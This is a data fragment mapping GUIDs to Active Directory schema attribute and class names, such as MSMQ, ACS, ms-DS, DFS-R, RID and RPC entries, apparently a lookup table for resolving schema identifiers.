"2a39c5b0-8960-11d1-aebc-0000f80367c1": "Remote-Storage-GUID",
"41bc7f04-be72-4930-bd10-1f3439412387": "MS-TS-ExpireDate3",
"2a39c5bd-8960-11d1-aebc-0000f80367c1": "Remote-Storage-Service-Point",
"7f56127d-5301-11d1-a9c5-0000f80367c1": "ACS-Aggregate-Token-Rate-Per-User",
"2a132583-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Command",
"20119867-1d04-4ab7-9371-cfc3d5df0afd": "ms-DS-Supported-Encryption-Types",
"18120de8-f4c4-4341-bd95-32eb5bcf7c80": "MSMQ-Computer-Type-Ex",
"281416c0-1968-11d0-a28f-00aa003049e2": "Repl-Property-Meta-Data",
"5e11dc43-204a-4faf-a008-6863621c6f5f": "MS-TS-ExpireDate4",
"39bad96d-c2d6-4baf-88ab-7e4207600117": "document",
"7f561283-5301-11d1-a9c5-0000f80367c1": "ACS-Allocable-RSVP-Bandwidth",
"2a132584-9373-11d1-aebc-0000f80367c1": "FRS-Time-Last-Config-Change",
"29cc866e-49d3-4969-942e-1dbc0925d183": "ms-DS-Trust-Forest-Trust-Info",
"9a0dc33a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Cost",
"7bfdcb83-4807-11d1-a9c3-0000f80367c1": "Repl-Topology-Stay-Of-Execution",
"0ae94a89-372f-4df2-ae8a-c64a2bc47278": "MS-TS-LicenseVersion",
"a8df74d6-c5ea-11d1-bbcb-0080c76670c0": "Residential-Person",
"1cb355a1-56d0-11d1-a9c6-0000f80367c1": "ACS-Cache-Timeout",
"1be8f172-a9ff-11d0-afe2-00c04fd930c9": "FRS-Update-Timeout",
"461744d7-f3b6-45ba-8753-fb9552a5df32": "ms-DS-Tombstone-Quota-Factor",
"9a0dc334-c100-11d1-bbc5-0080c76670c0": "MSMQ-CSP-Name",
"bf967a16-0de6-11d0-a285-00aa003049e2": "Repl-UpToDate-Vector",
"4b0df103-8d97-45d9-ad69-85c3080ba4e7": "MS-TS-LicenseVersion2",
"7a2be07c-302f-4b96-bc90-0795d66885f8": "documentSeries",
"7f56127a-5301-11d1-a9c5-0000f80367c1": "ACS-Direction",
"2a132585-9373-11d1-aebc-0000f80367c1": "FRS-Version",
"7b7cce4f-f1f5-4bb6-b7eb-23504af19e75": "ms-DS-Top-Quota-Usage",
"2df90d83-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Service",
"bf967a18-0de6-11d0-a285-00aa003049e2": "Replica-Source",
"f8ba8f81-4cab-4973-a3c8-3a6da62a5e31": "MS-TS-LicenseVersion3",
"19195a5a-6da0-11d0-afd3-00c04fd930c9": "Domain",
"b93e3a78-cbae-485e-a07b-5ef4ae505686": "rFC822LocalPart",
"1cb355a0-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-DeadTime",
"26d9736c-6070-11d1-a9c6-0000f80367c1": "FRS-Version-GUID",
"d064fb68-1480-11d3-91c1-0000f87a57d4": "MS-DS-Machine-Account-Quota",
"2df90d76-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Services",
"bf967a1c-0de6-11d0-a285-00aa003049e2": "Reports",
"70ca5d97-2304-490a-8a27-52678c8d2095": "MS-TS-LicenseVersion4",
"19195a5b-6da0-11d0-afd3-00c04fd930c9": "Domain-DNS",
"1cb3559e-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Priority",
"1be8f173-a9ff-11d0-afe2-00c04fd930c9": "FRS-Working-Path",
"638ec2e8-22e7-409c-85d2-11b21bee72de": "ms-DS-Object-Reference",
"9a0dc33c-c100-11d1-bbc5-0080c76670c0": "MSMQ-Digests",
"45ba9d1a-56fa-11d2-90d0-00c04fd91ab1": "Repl-Interval",
"f3bcc547-85b0-432c-9ac0-304506bf2c83": "MS-TS-ManagingLS",
"6617188d-8f3c-11d0-afda-00c04fd930c9": "RID-Manager",
"1cb3559f-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Refresh",
"66171887-8f3c-11d0-afda-00c04fd930c9": "FSMO-Role-Owner",
"2b702515-c1f7-4b3b-b148-c0e4c6ceecb4": "ms-DS-Object-Reference-BL",
"0f71d8e0-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Digests-Mig",
"bf967a1d-0de6-11d0-a285-00aa003049e2": "Reps-From",
"349f0757-51bd-4fc8-9d66-3eceea8a25be": "MS-TS-ManagingLS2",
"bf967a99-0de6-11d0-a285-00aa003049e2": "Domain-Policy",
"7f561287-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-ACS-Service",
"5fd424a1-1262-11d0-a060-00aa006c33ed": "Garbage-Coll-Period",
"93f701be-fa4c-43b6-bc2f-4dbea718ffab": "ms-DS-Operations-For-Az-Role",
"2df90d82-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Service",
"bf967a1e-0de6-11d0-a285-00aa003049e2": "Reps-To",
"fad5dcc1-2130-4c87-a118-75322cd67050": "MS-TS-ManagingLS3",
"7bfdcb89-4807-11d1-a9c3-0000f80367c1": "RID-Set",
"f072230e-aef5-11d1-bdcf-0000f80367c1": "ACS-Enable-RSVP-Accounting",
"bf96797a-0de6-11d0-a285-00aa003049e2": "Generated-Connection",
"f85b6228-3734-4525-b6b7-3f3bb220902c": "ms-DS-Operations-For-Az-Role-BL",
"2df90d78-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Services",
"7d6c0e93-7e20-11d0-afd6-00c04fd930c9": "Required-Categories",
"f7a3b6a0-2107-4140-b306-75cb521731e5": "MS-TS-ManagingLS4",
"8bfd2d3d-efda-4549-852c-f85e137aedc6": "domainRelatedObject",
"7f561285-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-RSVP-Message-Logging",
"16775804-47f3-11d1-a9c3-0000f80367c1": "Generation-Qualifier",
"1aacb436-2e9d-44a9-9298-ce4debeb6ebf": "ms-DS-Operations-For-Az-Task",
"9a0dc331-c100-11d1-bbc5-0080c76670c0": "MSMQ-Encrypt-Key",
"7bfdcb7f-4807-11d1-a9c3-0000f80367c1": "Retired-Repl-DSA-Signatures",
"87e53590-971d-4a52-955b-4794d15a84ae": "MS-TSLS-Property01",
"7860e5d2-c8b0-4cbb-bd45-d9455beb9206": "room",
"eded5844-b3c3-41c3-a9e6-8984b52b7f98": "ms-Org-Group-Subtype-Name",
"7f561286-5301-11d1-a9c5-0000f80367c1": "ACS-Event-Log-Level",
"f0f8ff8e-1191-11d0-a060-00aa006c33ed": "Given-Name",
"a637d211-5739-4ed1-89b2-88974548bc59": "ms-DS-Operations-For-Az-Task-BL",
"9a0dc32f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Foreign",
"b7c69e6d-2cc7-11d2-854e-00a0c983f608": "Token-Groups",
"47c77bb0-316e-4e2f-97f1-0d4c48fca9dd": "MS-TSLS-Property02",
"09b10f14-6f93-11d2-9905-0000f87a57d4": "DS-UI-Settings",
"49b7560b-4707-4aa0-a27c-e17a09ca3f97": "ms-Org-Is-Organizational-Group",
"dab029b6-ddf7-11d1-90a5-00c04fd91ab1": "ACS-Identity-Name",
"f754c748-06f4-11d2-aa53-00c04fd7d83a": "Global-Address-List",
"79d2f34c-9d7d-42bb-838f-866b3e4400e2": "ms-DS-Other-Settings",
"9a0dc32c-c100-11d1-bbc5-0080c76670c0": "MSMQ-In-Routing-Servers",
"46a9b11d-60ae-405a-b7e8-ff8a58d456d2": "Token-Groups-Global-And-Universal",
"6a84ede5-741e-43fd-9dd6-aa0f61578621": "ms-DFSR-DisablePacketPrivacy",
"80212842-4bdc-11d1-a9c4-0000f80367c1": "Rpc-Container",
"8f905f24-a413-435a-8ed1-35385ec179f7": "ms-Org-Other-Display-Names",
"f072230c-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Aggregate-Peak-Rate-Per-User",
"bf96797d-0de6-11d0-a285-00aa003049e2": "Governs-ID",
"564e9325-d057-c143-9e3b-4f9e5ef46f93": "ms-DS-Principal-Name",
"8ea825aa-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval1",
"040fc392-33df-11d2-98b2-0000f87a57d4": "Token-Groups-No-GC-Acceptable",
"87811bd5-cd8b-45cb-9f5d-980f3a9e0c97": "ms-DFSR-DefaultCompressionExclusionFilter",
"3fdfee52-47f4-11d1-a9c3-0000f80367c1": "DSA",
"ee5b6790-3358-41a8-93f2-134ce21f3813": "ms-Org-Leaders",
"7f56127e-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Duration-Per-Flow",
"f30e3bbe-9ff0-11d1-b603-0000f80367c1": "GP-Link",
"fbb9a00d-3a8c-4233-9cf9-7189264903a1": "ms-DS-Quota-Amount",
"99b88f52-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval2",
"bf967a21-0de6-11d0-a285-00aa003049e2": "Revision",
"a68359dc-a581-4ee6-9015-5382c60f0fb4": "ms-DFSR-OnDemandExclusionFileFilter",
"bf967aac-0de6-11d0-a285-00aa003049e2": "rpc-Entry",
"afa58eed-a698-417e-9f56-fad54252c5f4": "ms-Org-Leaders-BL",
"f0722310-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-No-Of-Account-Files",
"f30e3bbf-9ff0-11d1-b603-0000f80367c1": "GP-Options",
"6655b152-101c-48b4-b347-e1fcebc60157": "ms-DS-Quota-Effective",
"9a0dc321-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal",
"bf967a22-0de6-11d0-a285-00aa003049e2": "Rid",
"7d523aff-9012-49b2-9925-f922a0018656": "ms-DFSR-OnDemandExclusionDirectoryFilter",
"66d51249-3355-4c1f-b24e-81f252aca23b": "Dynamic-Object",
"1cb3559c-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-No-Of-Log-Files",
"f30e3bc1-9ff0-11d1-b603-0000f80367c1": "GPC-File-Sys-Path",
"16378906-4ea5-49be-a8d1-bfd41dff4f65": "ms-DS-Quota-Trustee",
"9a0dc324-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal-Quota",
"66171889-8f3c-11d0-afda-00c04fd930c9": "RID-Allocation-Pool",
"11e24318-4ca6-4f49-9afe-e5eb1afa3473": "ms-DFSR-Options2",
"88611bdf-8cf4-11d0-afda-00c04fd930c9": "rpc-Group",
"7f561284-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth",
"f30e3bc0-9ff0-11d1-b603-0000f80367c1": "GPC-Functionality-Version",
"b5a84308-615d-4bb7-b05f-2f1746aa439f": "ms-DS-Quota-Used",
"9a0dc325-c100-11d1-bbc5-0080c76670c0": "MSMQ-Label",
"66171888-8f3c-11d0-afda-00c04fd930c9": "RID-Available-Pool",
"936eac41-d257-4bb9-bd55-f310a3cf09ad": "ms-DFSR-CommonStagingPath",
"dd712229-10e4-11d0-a05f-00aa006c33ed": "File-Link-Tracking",
"7f56127c-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth-Per-Flow",
"32ff8ecc-783f-11d2-9916-0000f87a57d4": "GPC-Machine-Extension-Names",
"8a167ce4-f9e8-47eb-8d78-f7fe80abb2cc": "ms-DS-NC-Repl-Cursors",
"4580ad25-d407-48d2-ad24-43e6e56793d7": "MSMQ-Label-Ex",
"66171886-8f3c-11d0-afda-00c04fd930c9": "RID-Manager-Reference",
"135eb00e-4846-458b-8ea2-a37559afd405": "ms-DFSR-CommonStagingSizeInMb",
"88611be1-8cf4-11d0-afda-00c04fd930c9": "rpc-Profile",
"f0722311-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Size-Of-RSVP-Account-File",
"42a75fc6-783f-11d2-9916-0000f87a57d4": "GPC-User-Extension-Names",
"9edba85a-3e9e-431b-9b1a-a5b6e9eda796": "ms-DS-NC-Repl-Inbound-Neighbors",
"9a0dc335-c100-11d1-bbc5-0080c76670c0": "MSMQ-Long-Lived",
"6617188c-8f3c-11d0-afda-00c04fd930c9": "RID-Next-RID",
"d64b9c23-e1fa-467b-b317-6964d744d633": "ms-DFSR-StagingCleanupTriggerInPercent",
"8e4eb2ed-4712-11d0-a1a0-00c04fd930c9": "File-Link-Tracking-Entry",
"1cb3559d-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-Size-Of-RSVP-Log-File",
"7bd4c7a6-1add-4436-8c04-3999a880154c": "GPC-WQL-Filter",
"855f2ef5-a1c5-4cc4-ba6d-32522848b61f": "ms-DS-NC-Repl-Outbound-Neighbors",
"9a0dc33f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Migrated",
"6617188a-8f3c-11d0-afda-00c04fd930c9": "RID-Previous-Allocation-Pool",
"b786cec9-61fd-4523-b2c1-5ceb3860bb32": "ms-DFS-Comment-v2",
"f29653cf-7ad0-11d0-afd6-00c04fd930c9": "rpc-Profile-Element",
"81f6e0df-3b90-11d2-90cc-00c04fd91ab1": "ACS-Max-Token-Bucket-Per-Flow",
"bf96797e-0de6-11d0-a285-00aa003049e2": "Group-Attributes",
"97de9615-b537-46bc-ac0f-10720f3909f3": "ms-DS-NC-Replica-Locations",
"1d2f4412-f10d-4337-9b48-6e5b125cd265": "MSMQ-Multicast-Address",
"7bfdcb7b-4807-11d1-a9c3-0000f80367c1": "RID-Set-References",
"35b8b3d9-c58f-43d6-930e-5040f2f1a781": "ms-DFS-Generation-GUID-v2",
"89e31c12-8530-11d0-afda-00c04fd930c9": "Foreign-Security-Principal",
"7f56127b-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Token-Rate-Per-Flow",
"bf967980-0de6-11d0-a285-00aa003049e2": "Group-Membership-SAM",
"3df793df-9858-4417-a701-735a1ecebf74": "ms-DS-NC-RO-Replica-Locations",
"9a0dc333-c100-11d1-bbc5-0080c76670c0": "MSMQ-Name-Style",
"6617188b-8f3c-11d0-afda-00c04fd930c9": "RID-Used-Pool",
"3c095e8a-314e-465b-83f5-ab8277bcf29b": "ms-DFS-Last-Modified-v2",
"88611be0-8cf4-11d0-afda-00c04fd930c9": "rpc-Server",
"87a2d8f9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Maximum-SDU-Size",
"eea65905-8ac6-11d0-afda-00c04fd930c9": "Group-Priority",
"f547511c-5b2a-44cc-8358-992a88258164": "ms-DS-NC-RO-Replica-Locations-BL",
"eb38a158-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Flags",
"8297931c-86d3-11d0-afda-00c04fd930c9": "Rights-Guid",
"edb027f3-5726-4dee-8d4e-dbf07e1ad1f1": "ms-DFS-Link-Identity-GUID-v2",
"c498f152-dc6b-474a-9f52-7cdba3d7d351": "friendlyCountry",
"9c65329b-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Delay-Variation",
"9a9a021e-4a5b-11d1-a9c3-0000f80367c1": "Group-Type",
"2de144fc-1f52-486f-bdf4-16fcc3084e54": "ms-DS-Non-Security-Group-Extra-Classes",
"6f914be6-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Stub",
"a8df7465-c5ea-11d1-bbcb-0080c76670c0": "Role-Occupant",
"86b021f6-10ab-40a2-a252-1dc0cc3be6a9": "ms-DFS-Link-Path-v2",
"f29653d0-7ad0-11d0-afd6-00c04fd930c9": "rpc-Server-Element",
"9517fefb-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Latency",
"eea65904-8ac6-11d0-afda-00c04fd930c9": "Groups-to-Ignore",
"d161adf0-ca24-4993-a3aa-8b2c981302e8": "MS-DS-Per-User-Trust-Quota",
"9a0dc330-c100-11d1-bbc5-0080c76670c0": "MSMQ-OS-Type",
"81d7f8c2-e327-4a0d-91c6-b42d4009115f": "roomNumber",
"57cf87f7-3426-4841-b322-02b3b6e9eba8": "ms-DFS-Link-Security-Descriptor-v2",
"8447f9f3-1027-11d0-a05f-00aa006c33ed": "FT-Dfs",
"8d0e7195-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Policed-Size",
"bf967982-0de6-11d0-a285-00aa003049e2": "Has-Master-NCs",
"8b70a6c6-50f9-4fa3-a71e-1ce03040449b": "MS-DS-Per-User-Trust-Tombstones-Quota",
"9a0dc32b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Out-Routing-Servers",
"7bfdcb80-4807-11d1-a9c3-0000f80367c1": "Root-Trust",
"200432ce-ec5f-4931-a525-d7f4afe34e68": "ms-DFS-Namespace-Identity-GUID-v2",
"2a39c5be-8960-11d1-aebc-0000f80367c1": "RRAS-Administration-Connection-Point",
"aec2cfe3-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Max-SDU-Size",
"bf967981-0de6-11d0-a285-00aa003049e2": "Has-Partial-Replica-NCs",
"d921b50a-0ab2-42cd-87f6-09cf83a91854": "ms-DS-Preferred-GC-Site",
"9a0dc328-c100-11d1-bbc5-0080c76670c0": "MSMQ-Owner-ID",
"88611bde-8cf4-11d0-afda-00c04fd930c9": "rpc-Ns-Annotation",
"0c3e5bc5-eb0e-40f5-9b53-334e958dffdb": "ms-DFS-Properties-v2",
"bf967a9c-0de6-11d0-a285-00aa003049e2": "Group",
"b6873917-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Min-Policed-Size",
"5fd424a7-1262-11d0-a060-00aa006c33ed": "Help-Data16",
"d7c53242-724e-4c39-9d4c-2df8c9d66c7a": "ms-DS-Repl-Attribute-Meta-Data",
"2df90d75-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Prev-Site-Gates",
"bf967a23-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Bindings",
"ec6d7855-704a-4f61-9aa6-c49a7c1d54c7": "ms-DFS-Schema-Major-Version",
"f39b98ae-938d-11d1-aebd-0000f80367c1": "RRAS-Administration-Dictionary",
"a331a73f-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Peak-Rate",
"5fd424a8-1262-11d0-a060-00aa006c33ed": "Help-Data32",
"2f5c8145-e1bd-410b-8957-8bfa81d5acfd": "ms-DS-Repl-Value-Meta-Data",
"9a0dc327-c100-11d1-bbc5-0080c76670c0": "MSMQ-Privacy-Level",
"7a0ba0e0-8e98-11d0-afda-00c04fd930c9": "rpc-Ns-Codeset",
"fef9a725-e8f1-43ab-bd86-6a0115ce9e38": "ms-DFS-Schema-Minor-Version",
"bf967a9d-0de6-11d0-a285-00aa003049e2": "Group-Of-Names",
"a916d7c9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Token-Size",
"5fd424a9-1262-11d0-a060-00aa006c33ed": "Help-File-Name",
"0ea12b84-08b3-11d3-91bc-0000f87a57d4": "MS-DS-Replicates-NC-Reason",
"9a0dc33e-c100-11d1-bbc5-0080c76670c0": "MSMQ-QM-ID",
"80212841-4bdc-11d1-a9c4-0000f80367c1": "rpc-Ns-Entry-Flags",
"2d7826f0-4cf7-42e9-a039-1110e0d9ca99": "ms-DFS-Short-Name-Link-Path-v2",
"bf967a91-0de6-11d0-a285-00aa003049e2": "Sam-Domain-Base",
"1cb355a2-56d0-11d1-a9c6-0000f80367c1": "ACS-Non-Reserved-Tx-Limit",
"ec05b750-a977-4efe-8e8d-ba6c1a6e33a8": "Hide-From-AB",
"85abd4f4-0a89-4e49-bdec-6f35bb2562ba": "ms-DS-Replication-Notify-First-DSA-Delay",
"8e441266-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Journal-Quota",
"bf967a24-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Group",
"6ab126c6-fa41-4b36-809e-7ca91610d48f": "ms-DFS-Target-List-v2",
"0310a911-93a3-4e21-a7a3-55d85ab2c48b": "groupOfUniqueNames",
"fe7afe45-3d14-43a7-afa7-3a1b144642af": "ms-Mcs-AdmPwdExpirationTime",
"f072230d-aef5-11d1-bdcf-0000f80367c1": "ACS-Non-Reserved-Tx-Size",
"bf967985-0de6-11d0-a285-00aa003049e2": "Home-Directory",
"d63db385-dd92-4b52-b1d8-0d3ecc0e86b6": "ms-DS-Replication-Notify-Subsequent-DSA-Delay",
"2df90d87-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Queue-Name-Ext",
"bf967a25-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Interface-ID",
"ea944d31-864a-4349-ada5-062e2c614f5e": "ms-DFS-Ttl-v2",
"bf967aad-0de6-11d0-a285-00aa003049e2": "Sam-Server",
"4c9928d7-d725-4fa6-a109-aba3ad8790e5": "ms-Mcs-AdmPwd",
"7f561282-5301-11d1-a9c5-0000f80367c1": "ACS-Permission-Bits",
"bf967986-0de6-11d0-a285-00aa003049e2": "Home-Drive",
"08e3aa79-eb1c-45b5-af7b-8f94246c8e41": "ms-DS-ReplicationEpoch",
"3f6b8e12-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Quota",
"29401c48-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Object-ID",
"3ced1465-7b71-2541-8780-1e1ea6243a82": "ms-DS-BridgeHead-Servers-Used",
"f30e3bc2-9ff0-11d1-b603-0000f80367c1": "Group-Policy-Container",
"1cb3559a-56d0-11d1-a9c6-0000f80367c1": "ACS-Policy-Name",
"a45398b7-c44a-4eb6-82d3-13c10946dbfe": "houseIdentifier",
"d5b35506-19d6-4d26-9afb-11357ac99b5e": "ms-DS-Retired-Repl-NC-Signatures",
"9a0dc320-c100-11d1-bbc5-0080c76670c0": "MSMQ-Queue-Type",
"bf967a27-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Priority",
"51c9f89d-4730-468d-a2b5-1d493212d17e": "ms-DS-Is-Used-As-Resource-Security-Attribute",
"bf967aae-0de6-11d0-a285-00aa003049e2": "Secret",
"7f561281-5301-11d1-a9c5-0000f80367c1": "ACS-Priority",
"6043df71-fa48-46cf-ab7c-cbd54644b22d": "host",
"b39a61be-ed07-4cab-9a4a-4963ed0141e1": "ms-ds-Schema-Extensions",
"9a0dc322-c100-11d1-bbc5-0080c76670c0": "MSMQ-Quota",
"bf967a28-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Profile-Entry",
"2e28edee-ed7c-453f-afe4-93bd86f2174f": "ms-DS-Claim-Possible-Values",
"7bfdcb8a-4807-11d1-a9c3-0000f80367c1": "Index-Server-Catalog",
"f072230f-aef5-11d1-bdcf-0000f80367c1": "ACS-RSVP-Account-Files-Location",
"f0f8ff83-1191-11d0-a060-00aa006c33ed": "Icon-Path",
"4c51e316-f628-43a5-b06b-ffb695fcb4f3": "ms-DS-SD-Reference-Domain",
"3bfe6748-b544-485a-b067-1b310c4334bf": "MSMQ-Recipient-FormatName",
"29401c4a-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Transfer-Syntax",
"c66217b9-e48e-47f7-b7d5-6552b8afd619": "ms-DS-Claim-Value-Type",
"4828cc14-1437-45bc-9b07-ad6f015e5f28": "inetOrgPerson",
"bf967aaf-0de6-11d0-a285-00aa003049e2": "Security-Object",
"1cb3559b-56d0-11d1-a9c6-0000f80367c1": "ACS-RSVP-Log-Files-Location",
"7d6c0e92-7e20-11d0-afd6-00c04fd930c9": "Implemented-Categories",
"4f146ae8-a4fe-4801-a731-f51848a4f4e4": "ms-DS-Security-Group-Extra-Classes",
"2df90d81-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Service",
"3e0abfd0-126a-11d0-a060-00aa006c33ed": "SAM-Account-Name",
"eebc123e-bae6-4166-9e5b-29884a8b76b0": "ms-DS-Claim-Attribute-Source",
"7f56127f-5301-11d1-a9c5-0000f80367c1": "ACS-Service-Type",
"7bfdcb87-4807-11d1-a9c3-0000f80367c1": "IndexedScopes",
"0e1b47d7-40a3-4b48-8d1b-4cac0c1cdf21": "ms-DS-Settings",
"2df90d77-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Services",
"6e7b626c-64f2-11d0-afd2-00c04fd930c9": "SAM-Account-Type",
"6afb0e4c-d876-437c-aeb6-c3e41454c272": "ms-DS-Claim-Type-Applies-To-Class",
"2df90d89-009f-11d2-aa4c-00c04fd7d83a": "Infrastructure-Update",
"bf967a92-0de6-11d0-a285-00aa003049e2": "Server",
"7f561279-5301-11d1-a9c5-0000f80367c1": "ACS-Time-Of-Day",
"52458023-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Incoming",
"c17c5602-bcb7-46f0-9656-6370ca884b72": "ms-DS-Site-Affinity",
"8bf0221b-7a06-4d63-91f0-1499941813d3": "MSMQ-Secured-Source",
"04d2d114-f799-4e9b-bcdc-90e8f5ba7ebe": "SAM-Domain-Updates",
"52c8d13a-ce0b-4f57-892b-18f5a43a2400": "ms-DS-Claim-Shares-Possible-Values-With",
"7f561280-5301-11d1-a9c5-0000f80367c1": "ACS-Total-No-Of-Flows",
"52458024-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Outgoing",
"789ee1eb-8c8e-4e4c-8cec-79b31b7617b5": "ms-DS-SPN-Suffixes",
"9a0dc32d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Service-Type",
"dd712224-10e4-11d0-a05f-00aa006c33ed": "Schedule",
"54d522db-ec95-48f5-9bbd-1880ebbb2180": "ms-DS-Claim-Shares-Possible-Values-With-BL",
"07383086-91df-11d1-aebc-0000f80367c1": "Intellimirror-Group",
"f780acc0-56f0-11d1-a9c6-0000f80367c1": "Servers-Container",
"7cbd59a5-3b90-11d2-90cc-00c04fd91ab1": "ACS-Server-List",
"f0f8ff90-1191-11d0-a060-00aa006c33ed": "Initials",
"35319082-8c4a-4646-9386-c2949d49894d": "ms-DS-Tasks-For-Az-Role",
"9a0dc33d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Services",
"bf967a2b-0de6-11d0-a285-00aa003049e2": "Schema-Flags-Ex",
"4d371c11-4cad-4c41-8ad2-b180ab2bd13c": "ms-DS-Members-Of-Resource-Property-List",
"6d05fb41-246b-11d0-a9c8-00aa006c33ed": "Additional-Information",
"96a7dd64-9118-11d1-aebc-0000f80367c1": "Install-Ui-Level",
"a0dcd536-5158-42fe-8c40-c00a7ad37959": "ms-DS-Tasks-For-Az-Role-BL",
"9a0dc33b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Certificates",
"bf967923-0de6-11d0-a285-00aa003049e2": "Schema-ID-GUID",
"7469b704-edb0-4568-a5a5-59f4862c75a7": "ms-DS-Members-Of-Resource-Property-List-BL",
"07383085-91df-11d1-aebc-0000f80367c1": "Intellimirror-SCP",
"b7b13123-b82e-11d0-afee-0000f80367c1": "Service-Administration-Point",
"032160be-9824-11d1-aec0-0000f80367c1": "Additional-Trusted-Service-Names",
"bf96798c-0de6-11d0-a285-00aa003049e2": "Instance-Type",
"b11c8ee2-5fcd-46a7-95f0-f38333f096cf": "ms-DS-Tasks-For-Az-Task",
"3881b8ea-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Sign-Certificates-Mig",
"f9fb64ae-93b4-11d2-9945-0000f87a57d4": "Schema-Info",
"b47f510d-6b50-47e1-b556-772c79e4ffc4": "ms-SPP-CSVLK-Pid",
"f0f8ff84-1191-11d0-a060-00aa006c33ed": "Address",
"b7c69e60-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Failover",
"df446e52-b5fa-4ca2-a42f-13f98a526c8f": "ms-DS-Tasks-For-Az-Task-BL",
"9a0dc332-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Key",
"1e2d06b4-ac8f-11d0-afe3-00c04fd930c9": "Schema-Update",
"a601b091-8652-453a-b386-87ad239b7c08": "ms-SPP-CSVLK-Partial-Product-Key",
"26d97376-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport",
"bf967ab1-0de6-11d0-a285-00aa003049e2": "Service-Class",
"f70b6e48-06f4-11d2-aa53-00c04fd7d83a": "Address-Book-Roots",
"b7c69e5e-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Generator",
"2cc4b836-b63f-4940-8d23-ea7acf06af56": "ms-DS-User-Account-Control-Computed",
"9a0dc337-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-1",
"bf967a2c-0de6-11d0-a285-00aa003049e2": "Schema-Version",
"9684f739-7b78-476d-8d74-31ad7692eef4": "ms-SPP-CSVLK-Sku-Id",
"5fd42461-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table",
"b7c69e5f-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Renew",
"add5cf10-7b09-4449-9ae6-2534148f8a72": "ms-DS-User-Password-Expiry-Time-Computed",
"9a0dc338-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-2",
"16f3a4c2-7e79-11d2-9921-0000f87a57d4": "Scope-Flags",
"9b663eda-3542-46d6-9df0-314025af2bac": "ms-SPP-KMS-Ids",
"26d97375-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport-Container",
"28630ec1-41d5-11d1-a9c1-0000f80367c1": "Service-Connection-Point",
"5fd42462-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table-MSDOS",
"bf96798d-0de6-11d0-a285-00aa003049e2": "International-ISDN-Number",
"146eb639-bb9f-4fc1-a825-e29e00c77920": "ms-DS-UpdateScript",
"fd129d8a-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Site-Foreign",
"bf9679a8-0de6-11d0-a285-00aa003049e2": "Script-Path",
"69bfb114-407b-4739-a213-c663802b3e37": "ms-SPP-Installation-Id",
"16775781-47f3-11d1-a9c3-0000f80367c1": "Address-Home",
"bf96798e-0de6-11d0-a285-00aa003049e2": "Invocation-Id",
"773e93af-d3b4-48d4-b3f9-06457602d3d0": "ms-DS-Source-Object-DN",
"9a0dc339-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-Gates",
"c3dbafa6-33df-11d2-98b2-0000f87a57d4": "SD-Rights-Effective",
